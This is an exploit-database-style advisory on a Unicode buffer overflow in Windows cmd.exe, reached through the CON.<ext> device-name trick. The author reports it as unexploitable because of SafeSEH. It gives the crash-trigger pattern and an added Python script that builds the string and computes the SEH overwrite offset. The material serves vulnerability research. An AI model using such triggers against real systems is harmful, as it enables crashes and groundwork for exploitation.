# Exploit Title: cmd.exe Unicode Buffer Overflow (SEH)
# Date: 7/8/2010
# Author: bitform
# Software Link: N/A
# Version: N/A
# Tested on: Windows Server 2003 SP2 and Windows XP SP2
# CVE : none

1) Acknowledgements

Props to Dan Crowley (@dan_crowley) at Core Security Technologies
for doing the research on Windows File Pseudonyms and coming up
with the idea for this buffer overflow.

His presentation can be found here:
www.sourceconference.com/bos10pubs/windows%20file%20pseudonyms.pptx

2) Bug

The TYPE command in Windows is equivalent to cat in *nix. It simply
outputs the contents of a file to stdout. If you use TYPE in conjunction
with the device file CON, you can redirect stdin into a file.

Example: TYPE CON > evil.txt

CON is still treated as the device even when an extension is appended
to it (CON.txt resolves to CON), so cmd.exe accepts CON.<ext> as a file
name. Supplying an overly long extension overflows a stack buffer in
cmd.exe and overwrites the structured exception handler record.

This buffer overflow is not exploitable since cmd.exe and its DLLs
are all compiled with SafeSEH, so the overwritten handler address is
rejected before it is ever called. Oh well. :D

3) Code

TYPE CON.<A * 626><B * 2><C * 2372>

Note: The two B's mark where the SEH record is overwritten.
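
The script below is an added example, not code from the advisory. It
reproduces the two facts the write-up relies on: that a reserved device
name such as CON keeps resolving to the device when an extension is
appended (the "file pseudonym"), and that the A/B/C pattern from section 3
places the two B's at a predictable offset. The reserved-name rule is a
simplified version of the documented Win32 behaviour (CON, PRN, AUX, NUL,
COM1-9, LPT1-9), and the byte offsets assume cmd.exe copies the name as
UTF-16LE, which is inferred from "Unicode" in the title rather than stated
on the page; both are assumptions.

```python
"""Added example (not part of the original advisory): reproduce the
CON.<ext> pseudonym trick and the TYPE trigger string from section 3,
then report where the SEH overwrite lands once the string is UTF-16.

Assumptions, not facts stated on the page:
  * cmd.exe copies the file name as UTF-16LE (inferred from "Unicode" in
    the title), so every character in the A/B/C pattern occupies 2 bytes.
  * The reserved-name rule below is a simplification of the documented
    Win32 behaviour (CON, PRN, AUX, NUL, COM1-9, LPT1-9; an extension
    does not un-reserve the name).
"""
from typing import Optional

RESERVED_DEVICES = {"CON", "PRN", "AUX", "NUL"}
RESERVED_DEVICES |= {f"COM{i}" for i in range(1, 10)}
RESERVED_DEVICES |= {f"LPT{i}" for i in range(1, 10)}


def dos_device_name(path: str) -> Optional[str]:
    """Return the DOS device a Win32 path name resolves to, or None.

    Simplified rule (assumption): take the last path component, drop
    trailing spaces and dots, cut at the first '.' or ':' and compare
    case-insensitively. This is why CON.AAAA... is still the console.
    """
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].rstrip(" .")
    for sep in ".:":
        idx = name.find(sep)
        if idx != -1:
            name = name[:idx]
    name = name.rstrip(" ").upper()
    return name if name in RESERVED_DEVICES else None


def build_trigger(a: int = 626, b: int = 2, c: int = 2372) -> str:
    """The section-3 pattern: CON. followed by A*626, B*2, C*2372."""
    return "CON." + "A" * a + "B" * b + "C" * c


def command_line(trigger: str) -> str:
    """The cmd.exe line that reproduces the crash."""
    return "TYPE " + trigger


def find_overwrite(trigger: str, marker: str = "BB",
                   encoding: str = "utf-16-le") -> int:
    """Byte offset of the marker inside the encoded extension.

    Returns -1 if the marker is absent. With the default pattern the
    two B's sit 626 * 2 = 1252 bytes past the start of the extension,
    i.e. the 4-byte slot the author reports as the SEH overwrite.
    """
    extension = trigger.split(".", 1)[1]
    return extension.encode(encoding).find(marker.encode(encoding))


def encoded_extension_length(trigger: str,
                             encoding: str = "utf-16-le") -> int:
    """How many bytes the extension occupies after widening."""
    return len(trigger.split(".", 1)[1].encode(encoding))


if __name__ == "__main__":
    trig = build_trigger()
    print("device name resolves to:", dos_device_name(trig))
    print("extension length:", len(trig) - 4, "chars,",
          encoded_extension_length(trig), "bytes as UTF-16LE")
    print("SEH marker offset (bytes):", find_overwrite(trig))
    print(command_line(trig)[:60] + "...")
```

Running it shows the 3000-character extension doubling to 6000 bytes
and the B marker landing at byte 1252, which is the arithmetic behind
the "two B's" note above: when a Unicode-widened copy is involved,
pattern offsets in characters have to be doubled before they map onto
the 4-byte SEH slots on the stack.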